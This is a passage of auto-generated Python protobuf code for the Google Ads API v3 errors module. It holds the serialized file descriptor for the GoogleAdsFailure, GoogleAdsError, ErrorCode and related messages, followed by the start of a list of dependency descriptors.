serialized_options=_b('\n\"com.google.ads.googleads.v3.errorsB\013ErrorsProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V3.Errors\312\002\036Google\\Ads\\GoogleAds\\V3\\Errors\352\002\"Google::Ads::GoogleAds::V3::Errors'),
serialized_pb=_b('\n1google/ads/googleads_v3/proto/errors/errors.proto\x12\x1egoogle.ads.googleads.v3.errors\x1a\x31google/ads/googleads_v3/proto/common/policy.proto\x1a\x30google/ads/googleads_v3/proto/common/value.proto\x1a\x42google/ads/googleads_v3/proto/errors/access_invitation_error.proto\x1aHgoogle/ads/googleads_v3/proto/errors/account_budget_proposal_error.proto\x1a>google/ads/googleads_v3/proto/errors/ad_customizer_error.proto\x1a\x33google/ads/googleads_v3/proto/errors/ad_error.proto\x1a<google/ads/googleads_v3/proto/errors/ad_group_ad_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/ad_group_bid_modifier_error.proto\x1a\x43google/ads/googleads_v3/proto/errors/ad_group_criterion_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/ad_group_error.proto\x1a>google/ads/googleads_v3/proto/errors/ad_group_feed_error.proto\x1a=google/ads/googleads_v3/proto/errors/ad_parameter_error.proto\x1a;google/ads/googleads_v3/proto/errors/ad_sharing_error.proto\x1a\x34google/ads/googleads_v3/proto/errors/adx_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/asset_error.proto\x1a;google/ads/googleads_v3/proto/errors/asset_link_error.proto\x1a?google/ads/googleads_v3/proto/errors/authentication_error.proto\x1a>google/ads/googleads_v3/proto/errors/authorization_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/bidding_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/bidding_strategy_error.proto\x1a>google/ads/googleads_v3/proto/errors/billing_setup_error.proto\x1a@google/ads/googleads_v3/proto/errors/campaign_budget_error.proto\x1a\x43google/ads/googleads_v3/proto/errors/campaign_criterion_error.proto\x1a?google/ads/googleads_v3/proto/errors/campaign_draft_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/campaign_error.proto\x1a\x44google/ads/googleads_v3/proto/errors/campaign_experiment_error.proto\x1a>google/ads/googleads_v3/proto/errors/campaign_feed_error.proto\x1a\x44google/ads/googleads_v3/proto/errors/campaign_shared_set_error.proto\x1a>google/ads/googleads_v3/proto/errors/change_status_error.proto\x1a@google/ads/googleads_v3/proto/errors/collection_size_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/context_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/conversion_action_error.proto\x1aMgoogle/ads/googleads_v3/proto/errors/conversion_adjustment_upload_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/conversion_upload_error.proto\x1a=google/ads/googleads_v3/proto/errors/country_code_error.proto\x1a:google/ads/googleads_v3/proto/errors/criterion_error.proto\x1a>google/ads/googleads_v3/proto/errors/currency_code_error.proto\x1a@google/ads/googleads_v3/proto/errors/custom_interest_error.proto\x1a\x45google/ads/googleads_v3/proto/errors/customer_client_link_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/customer_error.proto\x1a>google/ads/googleads_v3/proto/errors/customer_feed_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/customer_manager_link_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/database_error.proto\x1a\x35google/ads/googleads_v3/proto/errors/date_error.proto\x1a;google/ads/googleads_v3/proto/errors/date_range_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/distinct_error.proto\x1a\x35google/ads/googleads_v3/proto/errors/enum_error.proto\x1a\x44google/ads/googleads_v3/proto/errors/extension_feed_item_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/extension_setting_error.proto\x1aIgoogle/ads/googleads_v3/proto/errors/feed_attribute_reference_error.proto\x1a\x35google/ads/googleads_v
3/proto/errors/feed_error.proto\x1a:google/ads/googleads_v3/proto/errors/feed_item_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/feed_item_target_error.proto\x1a\x45google/ads/googleads_v3/proto/errors/feed_item_validation_error.proto\x1a=google/ads/googleads_v3/proto/errors/feed_mapping_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/field_error.proto\x1a;google/ads/googleads_v3/proto/errors/field_mask_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/function_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/function_parsing_error.proto\x1aOgoogle/ads/googleads_v3/proto/errors/geo_target_constant_suggestion_error.proto\x1a\x37google/ads/googleads_v3/proto/errors/header_error.proto\x1a\x33google/ads/googleads_v3/proto/errors/id_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/image_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/internal_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/invoice_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/keyword_plan_ad_group_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/keyword_plan_campaign_error.proto\x1a=google/ads/googleads_v3/proto/errors/keyword_plan_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/keyword_plan_idea_error.proto\x1a\x45google/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto\x1aNgoogle/ads/googleads_v3/proto/errors/keyword_plan_negative_keyword_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/label_error.proto\x1a>google/ads/googleads_v3/proto/errors/language_code_error.proto\x1a?google/ads/googleads_v3/proto/errors/list_operation_error.proto\x1a=google/ads/googleads_v3/proto/errors/manager_link_error.proto\x1a=google/ads/googleads_v3/proto/errors/media_bundle_error.proto\x1a;google/ads/googleads_v3/proto/errors/media_file_error.proto\x1a=google/ads/googleads_v3/proto/errors/media_upload_error.proto\x1a;google/ads/googleads_v3/proto/errors/multiplier_error.proto\x1a\x37google/ads/googleads_v3/proto/errors/mutate_error.proto\x1a;google/ads/googleads_v3/proto/errors/mutate_job_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/new_resource_creation_error.proto\x1a:google/ads/googleads_v3/proto/errors/not_empty_error.proto\x1a@google/ads/googleads_v3/proto/errors/not_whitelisted_error.proto\x1a\x35google/ads/googleads_v3/proto/errors/null_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/offline_user_data_job_error.proto\x1aHgoogle/ads/googleads_v3/proto/errors/operation_access_denied_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/operator_error.proto\x1a@google/ads/googleads_v3/proto/errors/partial_failure_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/payments_account_error.proto\x1a?google/ads/googleads_v3/proto/errors/policy_finding_error.proto\x1aLgoogle/ads/googleads_v3/proto/errors/policy_validation_parameter_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/policy_violation_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/query_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/quota_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/range_error.proto\x1a;google/ads/googleads_v3/proto/errors/reach_plan_error.proto\x1a?google/ads/googleads_v3/proto/errors/recommendation_error.proto\x1a<google/ads/googleads_v3/proto/errors/region_code_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/request_error.proto\x1aGgoogle/ads/googleads_v3/proto/errors/resource_access_denied_error.proto\x1aNgoogle/ads/googleads_v3/proto/errors/resource_count_limit_exceeded_error.proto\x1a\x38google/ad
s/googleads_v3/proto/errors/setting_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/shared_criterion_error.proto\x1a;google/ads/googleads_v3/proto/errors/shared_set_error.proto\x1a;google/ads/googleads_v3/proto/errors/size_limit_error.proto\x1a>google/ads/googleads_v3/proto/errors/string_format_error.proto\x1a>google/ads/googleads_v3/proto/errors/string_length_error.proto\x1a:google/ads/googleads_v3/proto/errors/time_zone_error.proto\x1a:google/ads/googleads_v3/proto/errors/url_field_error.proto\x1a:google/ads/googleads_v3/proto/errors/user_data_error.proto\x1a:google/ads/googleads_v3/proto/errors/user_list_error.proto\x1aKgoogle/ads/googleads_v3/proto/errors/youtube_video_registration_error.proto\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1cgoogle/api/annotations.proto\"R\n\x10GoogleAdsFailure\x12>\n\x06\x65rrors\x18\x01 \x03(\x0b\x32..google.ads.googleads.v3.errors.GoogleAdsError\"\x98\x02\n\x0eGoogleAdsError\x12=\n\nerror_code\x18\x01 \x01(\x0b\x32).google.ads.googleads.v3.errors.ErrorCode\x12\x0f\n\x07message\x18\x02 \x01(\t\x12\x36\n\x07trigger\x18\x03 \x01(\x0b\x32%.google.ads.googleads.v3.common.Value\x12?\n\x08location\x18\x04 \x01(\x0b\x32-.google.ads.googleads.v3.errors.ErrorLocation\x12=\n\x07\x64\x65tails\x18\x05 \x01(\x0b\x32,.google.ads.googleads.v3.errors.ErrorDetails\"\xcbZ\n\tErrorCode\x12V\n\rrequest_error\x18\x01 \x01(\x0e\x32=.google.ads.googleads.v3.errors.RequestErrorEnum.RequestErrorH\x00\x12o\n\x16\x62idding_strategy_error\x18\x02 \x01(\x0e\x32M.google.ads.googleads.v3.errors.BiddingStrategyErrorEnum.BiddingStrategyErrorH\x00\x12Z\n\x0furl_field_error\x18\x03 \x01(\x0e\x32?.google.ads.googleads.v3.errors.UrlFieldErrorEnum.UrlFieldErrorH\x00\x12i\n\x14list_operation_error\x18\x04 \x01(\x0e\x32I.google.ads.googleads.v3.errors.ListOperationErrorEnum.ListOperationErrorH\x00\x12P\n\x0bquery_error\x18\x05 \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.QueryErrorEnum.QueryErrorH\x00\x12S\n\x0cmutate_error\x18\x07 \x01(\x0e\x32;.google.ads.googleads.v3.errors.MutateErrorEnum.MutateErrorH\x00\x12]\n\x10\x66ield_mask_error\x18\x08 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.FieldMaskErrorEnum.FieldMaskErrorH\x00\x12h\n\x13\x61uthorization_error\x18\t \x01(\x0e\x32I.google.ads.googleads.v3.errors.AuthorizationErrorEnum.AuthorizationErrorH\x00\x12Y\n\x0einternal_error\x18\n \x01(\x0e\x32?.google.ads.googleads.v3.errors.InternalErrorEnum.InternalErrorH\x00\x12P\n\x0bquota_error\x18\x0b \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.QuotaErrorEnum.QuotaErrorH\x00\x12G\n\x08\x61\x64_error\x18\x0c \x01(\x0e\x32\x33.google.ads.googleads.v3.errors.AdErrorEnum.AdErrorH\x00\x12W\n\x0e\x61\x64_group_error\x18\r \x01(\x0e\x32=.google.ads.googleads.v3.errors.AdGroupErrorEnum.AdGroupErrorH\x00\x12l\n\x15\x63\x61mpaign_budget_error\x18\x0e \x01(\x0e\x32K.google.ads.googleads.v3.errors.CampaignBudgetErrorEnum.CampaignBudgetErrorH\x00\x12Y\n\x0e\x63\x61mpaign_error\x18\x0f \x01(\x0e\x32?.google.ads.googleads.v3.errors.CampaignErrorEnum.CampaignErrorH\x00\x12k\n\x14\x61uthentication_error\x18\x11 \x01(\x0e\x32K.google.ads.googleads.v3.errors.AuthenticationErrorEnum.AuthenticationErrorH\x00\x12s\n\x18\x61\x64_group_criterion_error\x18\x12 \x01(\x0e\x32O.google.ads.googleads.v3.errors.AdGroupCriterionErrorEnum.AdGroupCriterionErrorH\x00\x12\x66\n\x13\x61\x64_customizer_error\x18\x13 \x01(\x0e\x32G.google.ads.googleads.v3.errors.AdCustomizerErrorEnum.AdCustomizerErrorH\x00\x12^\n\x11\x61\x64_group_ad_error\x18\x15 
\x01(\x0e\x32\x41.google.ads.googleads.v3.errors.AdGroupAdErrorEnum.AdGroupAdErrorH\x00\x12]\n\x10\x61\x64_sharing_error\x18\x18 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.AdSharingErrorEnum.AdSharingErrorH\x00\x12J\n\tadx_error\x18\x19 \x01(\x0e\x32\x35.google.ads.googleads.v3.errors.AdxErrorEnum.AdxErrorH\x00\x12P\n\x0b\x61sset_error\x18k \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.AssetErrorEnum.AssetErrorH\x00\x12V\n\rbidding_error\x18\x1a \x01(\x0e\x32=.google.ads.googleads.v3.errors.BiddingErrorEnum.BiddingErrorH\x00\x12u\n\x18\x63\x61mpaign_criterion_error\x18\x1d \x01(\x0e\x32Q.google.ads.googleads.v3.errors.CampaignCriterionErrorEnum.CampaignCriterionErrorH\x00\x12l\n\x15\x63ollection_size_error\x18\x1f \x01(\x0e\x32K.google.ads.googleads.v3.errors.CollectionSizeErrorEnum.CollectionSizeErrorH\x00\x12\x63\n\x12\x63ountry_code_error\x18m \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.CountryCodeErrorEnum.CountryCodeErrorH\x00\x12\\\n\x0f\x63riterion_error\x18 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.CriterionErrorEnum.CriterionErrorH\x00\x12Y\n\x0e\x63ustomer_error\x18Z \x01(\x0e\x32?.google.ads.googleads.v3.errors.CustomerErrorEnum.CustomerErrorH\x00\x12M\n\ndate_error\x18! \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.DateErrorEnum.DateErrorH\x00\x12]\n\x10\x64\x61te_range_error\x18\" \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.DateRangeErrorEnum.DateRangeErrorH\x00\x12Y\n\x0e\x64istinct_error\x18# \x01(\x0e\x32?.google.ads.googleads.v3.errors.DistinctErrorEnum.DistinctErrorH\x00\x12\x85\x01\n\x1e\x66\x65\x65\x64_attribute_reference_error\x18$ \x01(\x0e\x32[.google.ads.googleads.v3.errors.FeedAttributeReferenceErrorEnum.FeedAttributeReferenceErrorH\x00\x12Y\n\x0e\x66unction_error\x18% \x01(\x0e\x32?.google.ads.googleads.v3.errors.FunctionErrorEnum.FunctionErrorH\x00\x12o\n\x16\x66unction_parsing_error\x18& \x01(\x0e\x32M.google.ads.googleads.v3.errors.FunctionParsingErrorEnum.FunctionParsingErrorH\x00\x12G\n\x08id_error\x18\' \x01(\x0e\x32\x33.google.ads.googleads.v3.errors.IdErrorEnum.IdErrorH\x00\x12P\n\x0bimage_error\x18( \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.ImageErrorEnum.ImageErrorH\x00\x12\x66\n\x13language_code_error\x18n \x01(\x0e\x32G.google.ads.googleads.v3.errors.LanguageCodeErrorEnum.LanguageCodeErrorH\x00\x12\x63\n\x12media_bundle_error\x18* \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.MediaBundleErrorEnum.MediaBundleErrorH\x00\x12\x63\n\x12media_upload_error\x18t \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.MediaUploadErrorEnum.MediaUploadErrorH\x00\x12]\n\x10media_file_error\x18V \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.MediaFileErrorEnum.MediaFileErrorH\x00\x12_\n\x10multiplier_error\x18, \x01(\x0e\x32\x43.google.ads.googleads.v3.errors.MultiplierErrorEnum.MultiplierErrorH\x00\x12|\n\x1bnew_resource_creation_error\x18- \x01(\x0e\x32U.google.ads.googleads.v3.errors.NewResourceCreationErrorEnum.NewResourceCreationErrorH\x00\x12Z\n\x0fnot_empty_error\x18. 
\x01(\x0e\x32?.google.ads.googleads.v3.errors.NotEmptyErrorEnum.NotEmptyErrorH\x00\x12M\n\nnull_error\x18/ \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.NullErrorEnum.NullErrorH\x00\x12Y\n\x0eoperator_error\x18\x30 \x01(\x0e\x32?.google.ads.googleads.v3.errors.OperatorErrorEnum.OperatorErrorH\x00\x12P\n\x0brange_error\x18\x31 \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.RangeErrorEnum.RangeErrorH\x00\x12k\n\x14recommendation_error\x18: \x01(\x0e\x32K.google.ads.googleads.v3.errors.RecommendationErrorEnum.RecommendationErrorH\x00\x12`\n\x11region_code_error\x18\x33 \x01(\x0e\x32\x43.google.ads.googleads.v3.errors.RegionCodeErrorEnum.RegionCodeErrorH\x00\x12V\n\rsetting_error\x18\x34 \x01(\x0e\x32=.google.ads.googleads.v3.errors.SettingErrorEnum.SettingErrorH\x00\x12\x66\n\x13string_format_error\x18\x35 \x01(\x0e\x32G.google.ads.googleads.v3.errors.StringFormatErrorEnum.StringFormatErrorH\x00\x12\x66\n\x13string_length_error\x18\x36 \x01(\x0e\x32G.google.ads.googleads.v3.errors.StringLengthErrorEnum.StringLengthErrorH\x00\x12\x82\x01\n\x1doperation_access_denied_error\x18\x37 \x01(\x0e\x32Y.google.ads.googleads.v3.errors.OperationAccessDeniedErrorEnum.OperationAccessDeniedErrorH\x00\x12\x7f\n\x1cresource_access_denied_error\x18\x38 \x01(\x0e\x32W.google.ads.googleads.v3.errors.ResourceAccessDeniedErrorEnum.ResourceAccessDeniedErrorH\x00\x12\x92\x01\n#resource_count_limit_exceeded_error\x18\x39 \x01(\x0e\x32\x63.google.ads.googleads.v3.errors.ResourceCountLimitExceededErrorEnum.ResourceCountLimitExceededErrorH\x00\x12\x8b\x01\n youtube_video_registration_error\x18u \x01(\x0e\x32_.google.ads.googleads.v3.errors.YoutubeVideoRegistrationErrorEnum.YoutubeVideoRegistrationErrorH\x00\x12z\n\x1b\x61\x64_group_bid_modifier_error\x18; \x01(\x0e\x32S.google.ads.googleads.v3.errors.AdGroupBidModifierErrorEnum.AdGroupBidModifierErrorH\x00\x12V\n\rcontext_error\x18< \x01(\x0e\x32=.google.ads.googleads.v3.errors.ContextErrorEnum.ContextErrorH\x00\x12P\n\x0b\x66ield_error\x18= \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.FieldErrorEnum.FieldErrorH\x00\x12]\n\x10shared_set_error\x18> \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.SharedSetErrorEnum.SharedSetErrorH\x00\x12o\n\x16shared_criterion_error\x18? 
\x01(\x0e\x32M.google.ads.googleads.v3.errors.SharedCriterionErrorEnum.SharedCriterionErrorH\x00\x12v\n\x19\x63\x61mpaign_shared_set_error\x18@ \x01(\x0e\x32Q.google.ads.googleads.v3.errors.CampaignSharedSetErrorEnum.CampaignSharedSetErrorH\x00\x12r\n\x17\x63onversion_action_error\x18\x41 \x01(\x0e\x32O.google.ads.googleads.v3.errors.ConversionActionErrorEnum.ConversionActionErrorH\x00\x12\x91\x01\n\"conversion_adjustment_upload_error\x18s \x01(\x0e\x32\x63.google.ads.googleads.v3.errors.ConversionAdjustmentUploadErrorEnum.ConversionAdjustmentUploadErrorH\x00\x12r\n\x17\x63onversion_upload_error\x18o \x01(\x0e\x32O.google.ads.googleads.v3.errors.ConversionUploadErrorEnum.ConversionUploadErrorH\x00\x12S\n\x0cheader_error\x18\x42 \x01(\x0e\x32;.google.ads.googleads.v3.errors.HeaderErrorEnum.HeaderErrorH\x00\x12Y\n\x0e\x64\x61tabase_error\x18\x43 \x01(\x0e\x32?.google.ads.googleads.v3.errors.DatabaseErrorEnum.DatabaseErrorH\x00\x12i\n\x14policy_finding_error\x18\x44 \x01(\x0e\x32I.google.ads.googleads.v3.errors.PolicyFindingErrorEnum.PolicyFindingErrorH\x00\x12M\n\nenum_error\x18\x46 \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.EnumErrorEnum.EnumErrorH\x00\x12\x63\n\x12keyword_plan_error\x18G \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.KeywordPlanErrorEnum.KeywordPlanErrorH\x00\x12|\n\x1bkeyword_plan_campaign_error\x18H \x01(\x0e\x32U.google.ads.googleads.v3.errors.KeywordPlanCampaignErrorEnum.KeywordPlanCampaignErrorH\x00\x12\x92\x01\n#keyword_plan_negative_keyword_error\x18I \x01(\x0e\x32\x63.google.ads.googleads.v3.errors.KeywordPlanNegativeKeywordErrorEnum.KeywordPlanNegativeKeywordErrorH\x00\x12z\n\x1bkeyword_plan_ad_group_error\x18J \x01(\x0e\x32S.google.ads.googleads.v3.errors.KeywordPlanAdGroupErrorEnum.KeywordPlanAdGroupErrorH\x00\x12y\n\x1akeyword_plan_keyword_error\x18K \x01(\x0e\x32S.google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum.KeywordPlanKeywordErrorH\x00\x12p\n\x17keyword_plan_idea_error\x18L \x01(\x0e\x32M.google.ads.googleads.v3.errors.KeywordPlanIdeaErrorEnum.KeywordPlanIdeaErrorH\x00\x12\x82\x01\n\x1d\x61\x63\x63ount_budget_proposal_error\x18M \x01(\x0e\x32Y.google.ads.googleads.v3.errors.AccountBudgetProposalErrorEnum.AccountBudgetProposalErrorH\x00\x12Z\n\x0fuser_list_error\x18N \x01(\x0e\x32?.google.ads.googleads.v3.errors.UserListErrorEnum.UserListErrorH\x00\x12\x66\n\x13\x63hange_status_error\x18O \x01(\x0e\x32G.google.ads.googleads.v3.errors.ChangeStatusErrorEnum.ChangeStatusErrorH\x00\x12M\n\nfeed_error\x18P \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.FeedErrorEnum.FeedErrorH\x00\x12\x95\x01\n$geo_target_constant_suggestion_error\x18Q \x01(\x0e\x32\x65.google.ads.googleads.v3.errors.GeoTargetConstantSuggestionErrorEnum.GeoTargetConstantSuggestionErrorH\x00\x12i\n\x14\x63\x61mpaign_draft_error\x18R \x01(\x0e\x32I.google.ads.googleads.v3.errors.CampaignDraftErrorEnum.CampaignDraftErrorH\x00\x12Z\n\x0f\x66\x65\x65\x64_item_error\x18S \x01(\x0e\x32?.google.ads.googleads.v3.errors.FeedItemErrorEnum.FeedItemErrorH\x00\x12P\n\x0blabel_error\x18T \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.LabelErrorEnum.LabelErrorH\x00\x12\x66\n\x13\x62illing_setup_error\x18W \x01(\x0e\x32G.google.ads.googleads.v3.errors.BillingSetupErrorEnum.BillingSetupErrorH\x00\x12y\n\x1a\x63ustomer_client_link_error\x18X \x01(\x0e\x32S.google.ads.googleads.v3.errors.CustomerClientLinkErrorEnum.CustomerClientLinkErrorH\x00\x12|\n\x1b\x63ustomer_manager_link_error\x18[ 
\x01(\x0e\x32U.google.ads.googleads.v3.errors.CustomerManagerLinkErrorEnum.CustomerManagerLinkErrorH\x00\x12\x63\n\x12\x66\x65\x65\x64_mapping_error\x18\\ \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.FeedMappingErrorEnum.FeedMappingErrorH\x00\x12\x66\n\x13\x63ustomer_feed_error\x18] \x01(\x0e\x32G.google.ads.googleads.v3.errors.CustomerFeedErrorEnum.CustomerFeedErrorH\x00\x12\x64\n\x13\x61\x64_group_feed_error\x18^ \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.AdGroupFeedErrorEnum.AdGroupFeedErrorH\x00\x12\x66\n\x13\x63\x61mpaign_feed_error\x18` \x01(\x0e\x32G.google.ads.googleads.v3.errors.CampaignFeedErrorEnum.CampaignFeedErrorH\x00\x12l\n\x15\x63ustom_interest_error\x18\x61 \x01(\x0e\x32K.google.ads.googleads.v3.errors.CustomInterestErrorEnum.CustomInterestErrorH\x00\x12x\n\x19\x63\x61mpaign_experiment_error\x18\x62 \x01(\x0e\x32S.google.ads.googleads.v3.errors.CampaignExperimentErrorEnum.CampaignExperimentErrorH\x00\x12v\n\x19\x65xtension_feed_item_error\x18\x64 \x01(\x0e\x32Q.google.ads.googleads.v3.errors.ExtensionFeedItemErrorEnum.ExtensionFeedItemErrorH\x00\x12\x63\n\x12\x61\x64_parameter_error\x18\x65 \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.AdParameterErrorEnum.AdParameterErrorH\x00\x12y\n\x1a\x66\x65\x65\x64_item_validation_error\x18\x66 \x01(\x0e\x32S.google.ads.googleads.v3.errors.FeedItemValidationErrorEnum.FeedItemValidationErrorH\x00\x12r\n\x17\x65xtension_setting_error\x18g \x01(\x0e\x32O.google.ads.googleads.v3.errors.ExtensionSettingErrorEnum.ExtensionSettingErrorH\x00\x12m\n\x16\x66\x65\x65\x64_item_target_error\x18h \x01(\x0e\x32K.google.ads.googleads.v3.errors.FeedItemTargetErrorEnum.FeedItemTargetErrorH\x00\x12o\n\x16policy_violation_error\x18i \x01(\x0e\x32M.google.ads.googleads.v3.errors.PolicyViolationErrorEnum.PolicyViolationErrorH\x00\x12]\n\x10mutate_job_error\x18l \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.MutateJobErrorEnum.MutateJobErrorH\x00\x12l\n\x15partial_failure_error\x18p \x01(\x0e\x32K.google.ads.googleads.v3.errors.PartialFailureErrorEnum.PartialFailureErrorH\x00\x12\x8e\x01\n!policy_validation_parameter_error\x18r \x01(\x0e\x32\x61.google.ads.googleads.v3.errors.PolicyValidationParameterErrorEnum.PolicyValidationParameterErrorH\x00\x12]\n\x10size_limit_error\x18v \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.SizeLimitErrorEnum.SizeLimitErrorH\x00\x12z\n\x1boffline_user_data_job_error\x18w \x01(\x0e\x32S.google.ads.googleads.v3.errors.OfflineUserDataJobErrorEnum.OfflineUserDataJobErrorH\x00\x12l\n\x15not_whitelisted_error\x18x \x01(\x0e\x32K.google.ads.googleads.v3.errors.NotWhitelistedErrorEnum.NotWhitelistedErrorH\x00\x12\x63\n\x12manager_link_error\x18y \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.ManagerLinkErrorEnum.ManagerLinkErrorH\x00\x12\x66\n\x13\x63urrency_code_error\x18z \x01(\x0e\x32G.google.ads.googleads.v3.errors.CurrencyCodeErrorEnum.CurrencyCodeErrorH\x00\x12r\n\x17\x61\x63\x63\x65ss_invitation_error\x18| \x01(\x0e\x32O.google.ads.googleads.v3.errors.AccessInvitationErrorEnum.AccessInvitationErrorH\x00\x12]\n\x10reach_plan_error\x18} \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.ReachPlanErrorEnum.ReachPlanErrorH\x00\x12V\n\rinvoice_error\x18~ \x01(\x0e\x32=.google.ads.googleads.v3.errors.InvoiceErrorEnum.InvoiceErrorH\x00\x12o\n\x16payments_account_error\x18\x7f \x01(\x0e\x32M.google.ads.googleads.v3.errors.PaymentsAccountErrorEnum.PaymentsAccountErrorH\x00\x12[\n\x0ftime_zone_error\x18\x80\x01 
\x01(\x0e\x32?.google.ads.googleads.v3.errors.TimeZoneErrorEnum.TimeZoneErrorH\x00\x12^\n\x10\x61sset_link_error\x18\x81\x01 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.AssetLinkErrorEnum.AssetLinkErrorH\x00\x12[\n\x0fuser_data_error\x18\x82\x01 \x01(\x0e\x32?.google.ads.googleads.v3.errors.UserDataErrorEnum.UserDataErrorH\x00\x42\x0c\n\nerror_code\"\xc0\x01\n\rErrorLocation\x12[\n\x13\x66ield_path_elements\x18\x02 \x03(\x0b\x32>.google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement\x1aR\n\x10\x46ieldPathElement\x12\x12\n\nfield_name\x18\x01 \x01(\t\x12*\n\x05index\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"\xde\x01\n\x0c\x45rrorDetails\x12\x1e\n\x16unpublished_error_code\x18\x01 \x01(\t\x12X\n\x18policy_violation_details\x18\x02 \x01(\x0b\x32\x36.google.ads.googleads.v3.errors.PolicyViolationDetails\x12T\n\x16policy_finding_details\x18\x03 \x01(\x0b\x32\x34.google.ads.googleads.v3.errors.PolicyFindingDetails\"\xb3\x01\n\x16PolicyViolationDetails\x12#\n\x1b\x65xternal_policy_description\x18\x02 \x01(\t\x12?\n\x03key\x18\x04 \x01(\x0b\x32\x32.google.ads.googleads.v3.common.PolicyViolationKey\x12\x1c\n\x14\x65xternal_policy_name\x18\x05 \x01(\t\x12\x15\n\ris_exemptible\x18\x06 \x01(\x08\"f\n\x14PolicyFindingDetails\x12N\n\x14policy_topic_entries\x18\x01 \x03(\x0b\x32\x30.google.ads.googleads.v3.common.PolicyTopicEntryB\xe6\x01\n\"com.google.ads.googleads.v3.errorsB\x0b\x45rrorsProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V3.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V3\\Errors\xea\x02\"Google::Ads::GoogleAds::V3::Errorsb\x06proto3')
,
  dependencies=[
    google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_value__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_access__invitation__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_account__budget__proposal__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__customizer__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__ad__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__bid__modifier__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__criterion__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__feed__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__parameter__error__pb2.DESCRIPTOR,
    google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__sharing__error__pb2.DESCRIPTOR,
